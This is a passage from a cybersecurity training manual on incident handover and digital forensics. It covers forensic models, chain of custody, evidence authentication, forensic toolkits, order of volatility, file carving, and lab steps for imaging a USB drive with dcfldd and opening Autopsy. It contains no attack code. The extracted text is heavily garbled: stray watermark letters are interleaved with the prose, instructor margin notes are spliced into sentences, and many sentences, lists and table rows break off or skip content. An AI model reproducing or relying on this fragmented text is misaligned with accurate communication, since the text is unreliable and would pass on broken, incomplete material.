o
• Decide whether new policies need to be generated as a result of the incident or if the existing
D
ACTIVITY 10-4
Handing Over Incident Information to a
Forensic Investigation
e
Scenario
ut
You've concluded a breach has occurred, and you've done what you can to stop it and return
operations to normal. Suspecting that Develetech will want to weigh the possibility of pursuing legal
action, you and your CSIRT will prepare to hand off your results to a forensic investigation team.
ib
Sharing this information with this team accurately and efficiently will greatly assist their efforts.
Activity: Handing Over
tr
Incident Information to a
1. How do the goals of a forensic investigator differ from that of a first Forensic Investigation
is
Use this slide to
responder? summarize the incident
A: Answers may vary, but the most clear difference is that a first responder is concerned with to students. This will
D
detecting an incident and stopping it, thus returning operations to normal; whereas a forensic help them keep the
investigator is focused on evidence, as well as understanding the nature of an incident to pursue details fresh in their
punitive actions or determine that no such action should be taken. minds.
2. or
Despite the differences in goals, how do the two disciplines overlap?
A: Answers may vary, but both an incident responder and a forensic investigator will need to be
e
involved in securing and isolating assets, sharing information about the possible source and
vector of an attack, and reconstructing a timeline of events surrounding and including the incident.
at
3. What are some of the best practices that you can employ when
communicating your results to Develetech's forensic team?
lic
A: Answers will vary. First, the CSIRT will want to designate a liaison. Although both teams can meet
as a whole, this liaison will be an ongoing point of contact for the forensic team to consult with.
This point of contact should be the authoritative voice of the team, able to bridge both the needs of
up
the CSIRT and those of the forensic team. The CSIRT should also communicate the scope of the
incident: every asset affected, every employee involved, and so on. This will ensure that the
forensic team does not have an incomplete picture from which to draw evidence. It's also
important that the CSIRT describe the techniques and tools they used to contain and mitigate the
D
4. What specifically do you need to give the forensic team so they have all the
ot
morning and the failed remote connection attempt from the night before; hand over custody of
Pat's workstation and the research and development server, along with a list of activities the
CSIRT performed on these assets; and give them the AAR that details exactly what you know so
o
Summary
In this lesson, you prepared for and effectively responded to a cybersecurity incident, including tasks
you must perform to ensure that forensic analysis can be conducted effectively after the event.
Encourage students to
use the social Share a recent security incident you're familiar with and the nature of the
networking tools response.
provided on the CHOICE
e
A: Answers will vary. If no one volunteers to share an incident, be prepared to provide one from your
Course screen to follow experience.
up with their peers after
ut
the course is completed How did forensics play a role during the incident response process?
for further discussion
and resources to support A: Answers will vary. Depending on the severity or nature of the incident, some organizations may not
ib
continued learning. pursue any sort of forensic investigation. They may simply be interested in containing the situation
and improving upon their security, not finding out who was responsible. This may also be the case if
the culprit is easily identified. For those that did pursue an investigation, they might mention that the
tr
incident responders and forensic investigators needed to closely cooperate to ensure that both teams
could do their jobs effectively. The tasks performed by both of these teams often overlap, so
is
communication of expectations is important.
D
Note: Check your CHOICE Course screen for opportunities to interact with your classmates,
peers, and the larger CHOICE online community about the topics covered in this course or
other topics you are interested in. From the Course screen you can also access available
or
resources for a more continuous learning experience.
e
at
lic
up
D
ot
N
o
D
e
ut
Lesson Time: 2 hours, 40 minutes
ib
tr
is
Lesson Introduction
D
Following a cybersecurity incident, you may be called on to perform forensic analysis, such
as collecting evidence and determining how and why the incident occurred, and who caused
it.
Lesson Objectives
or
e
at
TOPIC A
Apply a Forensic Investigation Plan
Your organization may have legal obligations when investigating a cybersecurity incident, and you
will certainly have obligations to your organization and its stakeholders to get to the bottom of the
incident. It's important to have a plan to ensure you handle forensics properly, effectively, and in
e
compliance with applicable regulations.
ut
Forensic Analyst Responsibilities
ib
Forensic Analyst In any given day, a forensic analyst might be called upon to do the following tasks.
Responsibilities
Task Examples
tr
Follow legal • Ensure all forensic investigation activity is executed according to all
is
procedures for federal and local laws, safety regulations, and privacy standards, and in
protecting evidence line with company policies.
D
• Protect evidence by filling out a chain of custody form.
• During or after an incident, secure IT systems and hardware so they
cannot be tampered with.
Collect potential
sources of evidence
or
• Train others on proper procedures for protecting evidence.
• Use various forensic methods and specialist computer programs to
find, recover, and copy data that may have been hidden, encrypted,
e
damaged, password protected, or buried within massive datasets.
• Dismantle and rebuild systems, if necessary, to recover lost data.
at
Analyze evidence • Analyze storage, memory, logs, and other data sources to detect
information or user patterns that may be used as evidence of illegal
activity.
up
legal purposes.
Communicate and • Carefully document each stage of an investigation, and provide
ot
manner.
• Present technical findings to managers, law enforcement
organizations, and clients.
o
Support prosecution • Assist detectives and other officials in analyzing data and evaluating its
D
Model Phases
e
Abstract Digital Forensic Model (Reith, et al., 2002) 1. Identification
ut
2. Preparation
3. Approach strategy
ib
4. Preservation
5. Collection
6. Examination
tr
7. Analysis
is
8. Presentation
9. Returning evidence
D
The Enhanced Digital Investigation Process Model 1. Readiness
(Baryamureeba & Tushabe, 2004) 2. Deployment
3. Traceback
3. Data collection
4. Data analysis
lic
5. Findings presentation
6. Incident closure
Systematic Digital Forensic Investigation Model 1. Preparation
up
5. Communication shielding
6. Evidence collection
7. Preservation
ot
8. Examination
9. Analysis
N
10. Presentation
11. Result and review
o
3. Analysis
4. Presentation
5. Post-process
Model Phases
ACPO Good Practice Guide for Digital Evidence 1. The principles of digital
(Association of Chief Police Officers, 2012) evidence
2. Plan
3. Capture
4. Analyze
5. Present
e
Integrated Digital Forensic Process Model (Kohn, et al., 1. Documentation
2013)
ut
2. Preparation
3. Incident
4. Incident response
ib
5. Digital forensic investigation
6. Presentation
tr
Proposed Model for Digital Forensic Investigation (Mir, 1. Planning
et al., 2016) 2. Identification
is
3. Collection
4. Reconnaissance
D
5. Transport and storage
6. Examination
or 7. Analysis
8. Proof and defense
9. Archive storage
10. Presentation and results
e
at
Figure 11-1: The Generic Computer Forensic Investigation Model (GCFIM) consolidates many of
the phases that are interchangeable between forensic models. Note the ability to return to a
previous phase.
e
The following is a list of actions you can take to prepare for a forensic investigation: Forensic Investigation
ut
• Know the hardware used in your organization. Preparation
This might be a good
This can be everything from workstations, network devices, mobile devices, removable media, place to remind students
ib
and more. All these are potential sources of evidence, and they all have unique characteristics. Be about the usefulness of
aware of how each type of hardware can assist an investigation. site books in recording
• Know the operating systems used in your organization. asset and configuration
tr
information.
Different operating systems fulfill different purposes, and likewise, each may require a different
is
approach to evidence collection and analysis. Of particular concern is the difference in file
system types between Windows®, macOS®, and Linux® environments.
• Know the software used in your organization.
D
The more familiar you are with the programs personnel and devices use on a day-to-day basis,
the easier it will be to extract relevant information from these programs.
• Know the tools of the trade.
or
You shouldn't select forensic utilities after an incident occurs, but rather beforehand. This way,
you won't be scrambling to learn a new tool in the middle of your investigation.
e
• Know the virtualized environments in your organization.
Performing forensic investigations on virtual machines (VMs) is more of a challenge than
at
investigating a local machine because of the distributed nature of virtual environments. There
may be only small traces of evidence left on multiple hosts in a storage cluster, rather than a
lic
marked it as evidence. Some systems must stay active for business reasons, and for technical
reasons you may not be able to replicate their contents to an isolated environment. Consider how
an active system might affect the integrity of the evidence that resides on it.
• Know the applicable laws and regulations.
D
Failing to understand cyber laws may render your investigation pointless. You should stay
current on all applicable computer-related laws and regulations so you can quickly identify when
ot
Policy in the organization, and whether or not it has been followed consistently, can make a
significant difference in terms of whether action (legal, administrative, or otherwise) can be taken
against an entity once forensic data has been collected. There are many real-life cases where, after
o
data was collected, the perpetrator was not prosecuted/penalized because either no policy
specifically addressing acceptable use was in place or because the investigator(s) overstepped
D
Investigation Scope
There are times in an investigation when you come across activity beyond what you had originally Investigation Scope
set out to investigate. For example, your organization has been the victim of a denial of service
(DoS) attack. You think you've narrowed down possible culprits to internal employees, and you
move to confiscate specific workstations that you suspect carried out the attack. In the process of
investigating these workstations, you come across activity forbidden by company policy, as you find
evidence of a workstation's user posting company credentials on a public web forum. This suggests
another incident has taken place, possibly separate from the one you're investigating.
How should you plan to address something like this? This often comes down to what approach
management wants to take. You should ask your supervisor if you should continue focusing on the
main investigation, if you should start a new investigation, or if you should incorporate this new
evidence into the existing investigation. You may need to dig deeper and find out if this new
evidence is related to the current investigation before your supervisor can make an informed
e
decision. Taking on too large a scope could muddy your investigation, especially if your organization
ut
is low on qualified forensic personnel and you don't receive much help. If you don't consult with
your supervisor, you could place yourself, the investigation, and the evidence in jeopardy.
ib
Timeline Generation and Analysis
tr
Timeline Generation and A significant part of your forensic investigation will involve tying events to specific times so you
Analysis may establish a consistent and verifiable narrative. The visual representation of events happening in
chronological order is called a timeline, and it can be a powerful tool in your forensic toolkit. Being
is
Consider mentioning to
students that modified, able to analyze a timeline will give you a holistic perspective of the incident that wouldn't otherwise
accessed, and created be possible.
D
(MAC) times are
updated differently Timelines can be represented in a number of different ways, and a simple but effective way is by
based on the file system using spreadsheets. With a spreadsheet, you can sort and manage large amounts of data while
preserving the relevance of the time of an event or evidence. Typically, you'd tag each event or piece
used.
or
of evidence by several important identifiers. For example, you can list files you find in a computer's
web browser cache by their file name, date/time created, date/time last accessed, and date/time last
modified.
e
at
lic
up
Figure 11-2: A spreadsheet of a computer's web browser cache with relevant timeline
information.
D
However, large stores of evidence can prove unwieldy in a simple spreadsheet. Many forensic tools
have their own timeline generation features that can assist you in collecting file metadata and event
information automatically. Software like log2timeline can parse millions of artifacts on a drive and
ot
essentially generate a timeline of every recorded event on a particular system. This is called a super
timeline, and without the assistance of a tool, it can be infeasible to generate manually.
No matter what tools you use, you need to ensure the clocks from all relevant sources are
N
synchronized; if they can't be synchronized, then you must note any time offsets so that events are
placed in the proper context.
o
Note: In addition to using tools to list specific items in the context of time, you can also
perform a more qualitative analysis of the timeline of an event. For example, your report could
D
be in a narrative form, in which you essentially tell a story about what you believe happened and
when.
Authentication of Evidence
Gathering evidence does not automatically mean the evidence is admissible in a court or that it is Authentication of
completely validated in an investigation. The evidence must be authenticated or confirmed to be Evidence
exactly what a proponent of that evidence claims it is. For example, you may present a drive image
as evidence of an intrusion to a court, but until a technical expert in the employ of the court can
verify the hash of that image, it is not authenticated.
As you create a forensic investigation plan, you should consider how the various types of evidence
you can collect may be authenticated. This will help shape your investigation by underscoring its
e
crucial findings while trimming the weaker or inconclusive aspects. Take the example of an
ut
operating system log recording that a user account, A. Jones, was signed in as an attack was
launched from that host. If the access control mechanisms in place are weak or non-existent, then
the court will be much less inclined to authenticate this as evidence that employee Aaron Jones
ib
signed in, and not someone impersonating him.
You may also need to concede that some evidence simply cannot be authenticated, and therefore
will not be admissible. Different jurisdictions have different standards for authentication, and these
tr
standards may be too strict for you to meet with specific types of evidence. Sensitive network
transmissions, like financial transactions, are particularly hard to authenticate because of their
is
confidential and ephemeral nature. Also recognize that some evidence—hearsay, especially—will
not necessarily be admissible even if it is authenticated.
D
Chain of Custody
or
The chain of custody is the record of evidence handling from collection, to presentation in court,
to disposal. The evidence can be hardware components, electronic data, telephone systems, and
more. The chain of evidence reinforces the integrity and proper custody of evidence throughout the
Chain of Custody
Consider showing
students a chain of
e
entire investigative process. Every person in the chain who handles evidence must log the methods custody form. For
and tools they used. This can be done manually, like forensic personnel filling out a form, or it can example, you can
at
be done by an automated process that generates and maintains audit trails of actions taken. Both search for DA Form
approaches may be used at different points in the investigation. 4137, which is provided
by the U.S. Department
lic
When security breaches go to trial, the chain of custody protects an organization against accusations of the Army.
that evidence has either been tampered with or is wholly different than it was when collected.
Note: The chain of custody is a legal term that predates digital forensics, but the same basic
up
principles apply.
D
ot
Figure 11-3: The chain of custody from evidence collection through disposal.
N
Example
o
database that stores password hashes. No one besides the security team is authorized to access
this database. The destination IP of the outgoing traffic is attached to the workstation of an IT
employee who is currently on vacation.
2. Adam notifies his boss, Barry, of the abnormal traffic. Barry asks security engineer Emily to take
snapshots of the database in its current state, and cautions her to make sure backups from at
least a week prior are retained.
3. Emily uses her workstation to remotely log in to the server with the affected database and takes a
snapshot. She then extends the retention period of all backups saved in the past week.
4. Meanwhile, Barry commandeers the IT workstation and locks it in a security closet to which only
he, the building manager, and the CEO have keys.
5. After Emily is finished, Barry takes her workstation and the server with the affected database and
locks them in the same closet.
6. Barry asks the building manager for the security camera footage of the past 24 hours, and places
a copy of this footage in the closet.
7. Barry writes up an incident report and details every step of the process, mentioning every
e
individual involved in the evidence collection.
ut
Analysis
Assuming the camera footage shows someone accessing the absent employee's workstation, this
ib
incident may go to trial and charges may be levied against the person identified on camera.
However, if Barry had never documented the chain of custody of each piece of evidence as it passed
tr
from his coworkers' hands to his own, the suspect could bring reasonable doubt to the legitimacy of
this evidence. What if the database logs that record the outgoing traffic were tampered with to point
is
to an erroneous IP address? What if the camera footage was not from that day, but previous footage
of the suspect using the employee workstation with permission? These are questions a defense team
will raise to cast doubt on the investigation. Since Barry wisely kept the chain of custody on record,
D
it will be much more difficult for the defense to convince the judge the evidence should be
inadmissible in court.
Communication and
or
Communication and Interaction with Third Parties
Depending on your organization's available resources and the extent of an incident, you may need to
e
Interaction with Third contract with third-party forensic investigators and analysts. Some organizations are in the business
Parties of forensics, and may provide you and your team invaluable insight into the processes and
at
procedures of incident investigation. If this is the case, you will likely need to work with these third-
party forensic experts as a team.
lic
Effective collaboration with a third party means sharing information that the third party needs to
successfully complete their assigned duties. You should also be in constant contact with the third
party to not only check on their progress, but also to add their findings to the overall narrative of
up
the investigation. If one or all parties stay isolated and fail to share their findings in a timely fashion,
the investigation may end up being ineffective and inefficient. You should agree to a plan or
schedule that keeps communication consistent.
Another third party that may assist you in your investigation is law enforcement. Law enforcement
D
personnel are likely to have more experience with criminal cases, but they may not have the
technical expertise or intra-organization knowledge that you do. When you involve law enforcement,
you also run the risk of them seizing evidence for long periods of time, even after the case is
ot
concluded. You or other members of your organization must determine if this would impact
business operations enough to be too risky.
N
Forensic Toolkit: Open Establishing a toolkit is an important part of preparing for a forensic investigation. You should not
Source Software just limit yourself to tools with a narrow scope; your toolkit should be broad enough to cover the
D
You don't necessarily many different dimensions of forensic analysis. One tool will not necessarily cover all of these
need to discuss these dimensions. For example, a drive image is pointless without a tool to hash that image. If your toolkit
tools in detail. The intent isn't comprehensive, you can be caught off guard in the middle of an investigation.
is to make students
aware of their options. The following table describes some of the most common open source software tools used to collect
and analyze evidence.
e
Forensic Toolkit Institute that comes with a number of freeware
(SIFT) applications used in forensic investigations.
ut
Digital Forensics Cross-platform A general-purpose forensic tool that can be used
Framework (DFF) by non-experts in addition to professionals.
ib
Volatility Windows, Linux A tool used to analyze volatile memory like
RAM.
tr
Rekall Cross-platform A forensic analysis framework that supports live
volatile memory analysis on multiple platforms.
is
md5sum Windows, Linux A tool that calculates the Message Digest 5
(MD5) hashes of a file or group of files.
D
sha256sum Windows, Linux A tool that calculates the Secure Hash
Algorithm (SHA-256) hashes of a file or group
md5deep Cross-platform
of files.
or
Similar to md5sum and sha256sum, but includes
additional features, like the ability to traverse
directory structures recursively. Supports
e
SHA-1, SHA-256, and other algorithms beyond
at
just MD5.
Foremost Linux A data recovery and file carving tool.
lic
Linux never accesses or automatically mounts internal drives, nor does it use swap space on these
drives. Forensic Mode also disables the automatic mounting of removable media like USB thumb
N
drives. These restrictions ensure that the operating system does not initiate an action that could
compromise the integrity of forensic evidence during analysis.
o
In addition to open source forensic software, there are some proprietary software solutions as Forensic Toolkit:
outlined in the following table. Proprietary Software
e
Forensic Toolkit® Windows A multi-purpose utility developed by Exterro
(FTK®) (previously AccessData) that can scan a storage
ut
drive and detect behavior that may be of interest
to an investigator, such as deleted
communications. It has a program that images a
ib
drive and automatically creates a hash of that
image. It also includes a password cracking
tr
utility.
AD eDiscovery n/a A platform developed by Exterro that supports
is
the full electronic discovery (e-discovery)
process. It also enables an investigator or auditor
D
to search or audit large sets of structured or
unstructured data.
Forensic Explorer Windows A tool with a wide variety of features, including
RAM.
HashMyFiles Windows A freeware application that calculates the MD5
and SHA hashes of a file or group of files.
D
Forensic Toolkit: In addition to the various software programs available, you also need to consider collecting physical
Physical tools to place in your forensic toolkit.
N
Digital forensics To perform any kind of meaningful collection and analysis of evidence,
workstations you'll need one or more computers that act as the hub for your forensic
D
e
for data transfer. Rather than connect the drive directly to your forensics
workstation, you'll want to connect it to a write blocker so you can create
ut
an evidence file of the drive.
Removable media In some cases, you'll need to quickly offload or transfer data to a
ib
removable storage device so that a backup of the evidence can be stored
quickly and securely. For example, if you image a drive suspected of
compromise, you can store that image on removable media so that it can
tr
be easily moved to another workstation or provided to other personnel
involved in the investigation. Any removable media you use in this
is
manner should be completely wiped beforehand to prevent any
contamination of evidence.
D
Write blockers Contamination of evidence is a significant concern among forensic
investigators. One of the most crucial tools in preserving the integrity of
evidence is a write blocker. A write blocker is a drive controller that
or
accesses a drive in read-only mode and prevents the operating system
from writing data to the drive. If even a single bit changes on a drive as a
result of the investigation, the authenticity of evidence may be called into
question—write blockers prevent this from happening.
e
Mobile device forensics Forensic analysis of mobile devices is a relatively new field, but the rising
at
relevant detail in a picture, making it more difficult for you to prove some
aspect of an incident.
ot
Crime tape and In a physical incident, crime tape can help you cordon off specific areas
tamper-proof seals of a building or another environment while the investigation is underway.
This will deter employees and customers from wandering into the area
N
e
• To ensure you'll be able to collect as much digital evidence as possible, make sure that systems
are configured when deployed in advance of any incident or investigation to maximize the
ut
amount of collectable data. For example, enable a computer's or device's auditing services.
• The organization should develop its own capability to perform digital forensics. The skills
ib
required for this capability are valuable in a variety of circumstances, not only in incident
response situations. For example, forensic skills may be useful in troubleshooting operational
problems; supporting ongoing maintenance of audit records; recovering data when there are
tr
system problems or user errors; investigating cyber crimes and inappropriate behavior;
reconstructing computer security incidents; and monitoring actions conducted by third parties,
is
such as police investigators, on the organization's systems.
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 11-1
Applying a Forensic Investigation Plan
Scenario
e
Under the Chief Information Security Officer's (CISO's) authorization, the cybersecurity incident
response team (CSIRT) has handed off their work to you, a forensic investigator for Develetech.
ut
Your company's forensic model follows this basic pattern:
1. Preparation
ib
2. Acquisition
3. Analysis
tr
4. Presentation and review
Using this model, you'll begin to develop a plan for each phase of the process. This plan will help Activity: Applying a
is
you perform your investigative duties to the best of your ability, and hopefully will make it easier for Forensic Investigation
Plan
you to discover the source of this data breach.
If necessary, refresh
D
students' memories of
the incident scenario by
1. What must you know about Develetech's computing environments to prepare showing them the
for a forensic investigation?
or
A: Answers will vary. You need to know the following about the systems affected by the incident: the
type of hardware in place; the operating systems and other software used on the computers; any
activity slides from the
previous lesson.
e
environments that may have been virtualized versus those that are physical; the forensic tools of
the trade that can assist you in your duties; any of Develetech's systems that must stay active
at
during an investigation to support business needs; and all applicable laws and regulations that
could impact your work.
lic
scans, when it scanned the USB drive, it captured the names of some other
files that were on the USB drive.
ot
the other files on the USB drive. This could lead them to the culprit or at least the owner of the
USB drive.
o
D
3. None of the file names logged by the anti-malware solution revealed any
identifying information. However, the team searched for each file name in the
company's network storage spaces provisioned to each employee. This
search produced one result: the file my_contract_invoice3.docx, which was
enumerated in the anti-malware scan, exists in the network storage space of
an employee named Rupert. Your investigation isn't done, but you think
you've gathered enough evidence to present to your supervisor so that you
can take action.
e
What are some of the important steps involved in upholding the integrity of
ut
your investigation? How can you better convince your audience of your
findings?
ib
A: Answers may vary, but observing the chain of custody is a must for any investigation. The
movement of Pat's workstation and the research and development server should be documented
tr
based on who last worked with each computer and what exactly was done. This process should
be ongoing. Furthermore, you need to consider how the evidence you found so far can be
authenticated. You need to demonstrate to your supervisor, and possibly to law enforcement in
is
the future, that the evidence you gathered has not been tampered with. One example is by
hashing the images of each drive so that an outside party can verify that hash when the evidence
D
makes its way into their custody.
or
e
at
lic
up
D
ot
N
o
D
TOPIC B
Securely Collect and Analyze Electronic Evidence
You have a forensic investigation plan in place. Now, as you collect and analyze evidence, you'll
need to ensure you follow certain protocols to preserve data in a useful and secure format.
e
Order of Volatility
ut
Data is volatile, and the ability to retrieve or validate data after a security incident depends on where Order of Volatility
it is stored in a location or in a memory layer of a computer or external device. For example, data on
ib
backup CDs or thumb drives can last for years, while data in random-access memory (RAM) may
last for only nanoseconds.
tr
The order in which you need to recover data after an incident before the data deteriorates, is erased,
or is overwritten, is known as the order of volatility. From most volatile to least volatile, the general
is
order of volatility for storage media is:
1. CPU registers, CPU caches, and RAM.
D
2. Network caches and virtual memory.
3. Hard drives, flash drives, and solid-state drives (SSDs).
4. CD-ROMs, DVD-ROMs, and printouts.
or
Note: Volatility may also refer to the memory's impermanence when disconnected from a
power source. RAM loses its memory when it loses power, and is therefore volatile. An SSD will
retain its memory even when it loses power, and is therefore non-volatile.
e
The order of volatility is another factor that will influence your response to incidents. Highly volatile
at
memory like RAM may not be worth your time to present as evidence, as any trace of an intrusion
might be gone from the cache before you can possibly capture it. Still, some experiments have
shown that cryogenically frozen memory may be able to retain its non-degraded state for several
lic
days. For most organizations, this will not be a feasible option, but it could be a viable means of
forensic preservation in the future.
up
Instead of relying on an after-the-fact collection of volatile data, there are tools that can automate
volatile memory collection on live systems, even for highly volatile memory. These tools are often
batch scripts that execute various other tools to continuously capture and log network traffic,
operating system registries, RAM snapshots, and more. Committing these types of information to
D
permanent memory can pose a risk, so you must remember to follow the proper chain of custody
procedures to keep the information from being stolen or tampered with.
ot
File Systems
N
A computer's file system can reveal a great deal of useful information concerning an incident, File Systems
including the following:
• Directory structure.
o
• File location.
• File size.
D
• File names.
• Date and time values (last modified, last accessed, etc.).
• Miscellaneous attributes of files and folders.
Analyzing this metadata can help you establish your timeline of events for an incident that has left
traces on a host and its files.
There are a number of methods you can use to collect this metadata. Capturing a drive image will
keep the file system intact for later analysis. For a more specialized approach, there are various tools
that can help you collect and view file system metadata. For example, TSK is a forensic tool that can
analyze a file system without needing to go through the operating system. This makes the tool ideal
for collecting hidden or deleted files.
Not all file systems handle metadata the same. Factors like the age of the hardware and software, as
well as their manufacturer, may influence which file system type is used on a host. Older computers,
for example, may still use File Allocation Table 32 (FAT32), whereas newer Windows hosts will use
New Technology File System (NTFS) or, less commonly, Resilient File System (ReFS). Apple
e
macOS computers typically use Apple File System (APFS) or Hierarchical File System Plus (HFS+),
ut
whereas Linux distributions commonly use ext3, ext4, Btrfs, or ZFS. Flash memory devices like
USB thumb drives and SD cards, regardless of what operating system they're used with, often use
Extensible File Allocation Table (exFAT).
ib
Some collection tools like TSK actually support most of the major file system types, but you should
still be aware of the file system you're collecting.
tr
File Carving and Data Extraction
is
File Carving and Data File carving is the process of extracting data from a computer when that data has no associated file
Extraction system metadata. The file system metadata describes where a file exists in memory. Because files are
D
often fragmented into many pieces, there is not one single address that the file resides in. This is
why file system metadata that collates many addresses is so useful. When a user performs a normal
delete operation, like moving a document to the recycle bin, the file system deletes its metadata on
or
that file, rather than actually deleting where it is in memory. When you engage in file carving, you are
attempting to piece these fragments together to reconstruct the file.
This is essential to evidence collection, as even files a malicious user tries to delete may remain on
e
the target system. Data recovery software like PhotoRec and Foremost can perform file carving
techniques to extract deleted or corrupted data from a drive partition.
at
Data Preservation for Criminal cases or internal security audits can take months or years to resolve. You must be able to
Forensics preserve all the gathered evidence in a proper manner for a lengthy period of time. As you're
up
probably aware, computer hardware is prone to wear and tear, and important storage media like
hard disks can fail even when used normally, or when not used at all. A failure of this kind may
mean the corruption or loss of your evidence, both of which may have severe repercussions for your
investigation.
D
Therefore, when possible, you should replicate evidence across multiple storage media for the
purpose of redundancy. You should also be careful when selecting where to physically store this
ot
hardware. Rooms without proper climate controls will increase the risk of hardware failure,
especially if these electronics overheat.
Evidence can also become overwhelming by its sheer size and scope. That's why it's important to
N
create metadata that accurately defines characteristics about data, like its type, the date it was
collected and hashed, and what purpose it serves.
o
Secure Storage of It's inevitable that data on physical media will need to be stored before it is presented in court. How
Physical Evidence you store evidence to prevent malicious tampering is just as important as storing it to prevent
natural degradation. Physical media should be placed in evidence rooms that have controls like
locks, guards, surveillance cameras, etc. The only people with access to this room should be
authorized investigators. Even managers or executives should be barred from accessing the room
during an ongoing investigation, as they may not be familiar with proper evidence-handling
protocol.
Storing the media in a secure room is often not enough. Depending on the nature of the physical
medium, including its size and sensitivity to contact with other materials, you should consider
placing it in a lock box. If some unauthorized person does gain entry to the evidence room, they
won't necessarily be able to get to the evidence itself without considerable effort.
However, not all evidence needs this level of protection. For smaller media, like hard drives, discs,
thumb drives, and so on, placing them in evidence bags may be sufficient. Evidence bags are not
e
meant to ensure security directly, but they do help you identify, label, and categorize evidence
properly. The evidence bags you use might have space on at least one side for you to write the
ut
evidence's type, case number, date of collection, name of collecting agent, and a short description.
In the absence of such a space to write in, you may be able to affix an evidence tag to the bag that
has the same basic information on it. Using the space or a tag, you should also be able to maintain a
ib
chain of custody—every time a new person handles the bag and its contents, the chain from person
to person is recorded.
tr
Forensic Analysis of Compromised Systems
is
There are various procedures you can follow to help you analyze compromised systems in the event Forensic Analysis of
of an incident. Compromised Systems
D
Remind students that
Forensic Procedure Description the forensic procedures
Capture forensic
images and memory or
One of the most important steps in computer forensic evidence
procedures is to capture exact duplicates of the evidence, also known as
forensic images. This is accomplished by making a bit-for-bit copy of a
they implement will
depend heavily on the
context of the incident.
e
piece of media as an image file with high accuracy—a process called bit-
stream imaging. In addition, dumping a system's memory may reveal
at
Examine network Attackers always leave behind traces; you just need to know how and
traffic and logs where to look. Logs record everything that happens in an intrusion
prevention system (IPS) or intrusion detection system (IDS), and in
up
Capture video Video forensics is the method by which video is scrutinized for clues.
Tools for computer forensics are used in reassembling video to be used
ot
one time zone to another or if the time zone has deliberately been
changed on a system.
D
Take hashes You should take a hash of each piece of electronic evidence, including
storage partitions, software, and individual files. Later, law enforcement
or other third-party officials can verify the integrity of this evidence by
taking their own hashes. If the hashes match, then they can be reasonably
certain that the evidence was not tampered with.
e
Identify witnesses Courts generally accept evidence if it is seconded by the testimony of a
ut
witness who observed the procedure by which the evidence was acquired.
A computer forensic expert witness is someone who has experience in
handling computer forensic tools and is able to establish the validity of
ib
the evidence.
Track man hours and The increase in storage device capacities and encryption strength affects
tr
expenses the number of man hours that it can take to assess damage, and
consequently increase expenses incurred in any computer forensics
investigation. Capturing this expense is part of the overall damage
is
assessment for the incident. You may also be required to track these
things if your organization has an insurance policy.
D
Dynamic Analysis
or
Most of the procedures listed in the previous table are considered static analysis procedures. They
involve capturing and examining information that is not meant to change or interact with a
particular environment. This may not be adequate for your forensic investigation, however.
Dynamic analysis procedures enable you to observe evidence as it exhibits activity. This activity may
e
reveal more about the nature of an incident than if you had been analyzing evidence in an inert state.
at
Most dynamic analysis centers around the use of virtual machine sandboxes, like those used for
analyzing malware. Evidence that runs in a sandbox might be able to replicate the events of an
incident in a controlled environment, or it might provide you with more information about the
lic
source of an incident or its mechanism of action. For example, if you capture a system image, you
can construct a VM of that system and run it in the sandbox—taking note of any malicious
processes that start automatically.
up
Guidelines for Securely Follow these guidelines when collecting and analyzing electronic evidence.
Collecting and Analyzing
ot
• Collect evidence according to the order of volatility by which data degrades on various storage
media.
• Identify the file system and available metadata of the media you're analyzing.
o
• Engage in file carving and data recovery processes when no file system metadata is present.
D
• Ensure evidence data is preserved against degradation over a long period of time.
• Replicate evidence data across multiple storage media.
• Record useful and accurate metadata about data collected as evidence.
• Ensure physical evidence is locked behind access control mechanisms to keep unauthorized
personnel out.
• Consider placing storage media used as evidence in evidence bags with proper labeling.
• Apply the necessary forensic techniques when collecting and analyzing evidence, including
capturing bit-stream images, taking hashes, taking pictures, etc.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 11-2
Securely Collecting Electronic Evidence
e
A virtual copy of Rupert's confiscated USB drive has been added to Kali Linux. You will be using
dcfldd, a forensic imaging tool.
ut
Activity: Securely
Collecting Electronic Scenario
ib
Evidence
You presented your preliminary findings to upper management, and they've agreed to confront
Students may point out
Rupert. Rupert's supervisor noticed him using a USB drive on his workstation, and asked him to
that the hashing
tr
algorithm used in this
hand it over. Rupert reluctantly complied, and his supervisor passed custody of the USB drive on to
activity (MD5) is you. Management is considering criminal charges against Rupert, so you need to follow proper
forensic procedures and make a secure bitwise copy of the drive.
is
insecure. This is true,
but Autopsy only
supports MD5
D
verification. 1. Make a forensic image of the USB drive using the dcfldd tool.
a) On the Kali Linux desktop, verify that there is a virtual USB drive icon on the desktop (RUPERT).
or
e
at
lic
Note: In a real-world situation, you would connect the USB drive to your
analysis system using a physical write blocker to ensure that you change
nothing on the evidence drive.
up
c) Verify that there is a 50 megabyte (MB) drive with the name /dev/loop0
e
ut
ib
tr
is
This is the location of the mounted USB drive image.
D
d) Enter sudo dcfldd if=/dev/loop0 hash=md5 of=~/Desktop/usbimage.dd
hashlog=~/Desktop/hash.txt bs=512
or
Note: In this command, if is the input device, of is the output file, hash is the
preferred hash for integrity checking, hashlog saves the hash to a file, and bs
is the block transfer size.
e
e) After the process is complete, verify that the image file was written, as in the following screenshot.
at
lic
g) Verify the hash is the same as in the following screenshot, and keep this text file open. Students will copy this
hash in the next activity,
but you may wish to
D
A: A hash value supports integrity of evidence; when the drive image moves down the chain of drive in the next activity.
custody, the actual hash can be compared to the expected value. If they match, the forensic
D
analyst or court official can confirm that the evidence was not tampered with during this time.
3. What kinds of important metadata are usually collected in a drive image such
as this one? How can this metadata shape your investigation?
A: Answers may vary, but metadata can include: directory structure, file locations, file sizes, and the
date a file was created/last modified. This metadata can help a forensic analyst correlate data and
come to understand the bigger picture of an incident.
4. When it comes to keeping this drive image secure, what sort of preservation
techniques would you recommend?
A: Answers will vary. Because data is virtual, and must depend on physical hardware, it's a good idea
to replicate this image across more than one physical medium in case one were to fail. The rooms
in which you store these physical media should be locked and climate controlled.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 11-3
Analyzing Forensic Evidence
e
You'll be using Autopsy, a forensic analysis tool, to investigate the USB drive image you captured
earlier.
ut
Activity: Analyzing
Scenario Forensic Evidence
ib
Now that you've securely collected evidence from Rupert's USB drive, you can begin the process of
analyzing the evidence to determine who really is responsible for the incident, why they did it, and
tr
how. Being able to answer these questions will not only help you piece together what happened, but
will also be extremely valuable in the event that Develetech decides to press charges.
is
1. Start Autopsy.
D
a) Open another terminal window.
b) Enter sudo autopsy
c) Right-click the URL and select Open Link.
The Autopsy front-end opens in the Firefox ESR web browser.
or
e
at
lic
up
D
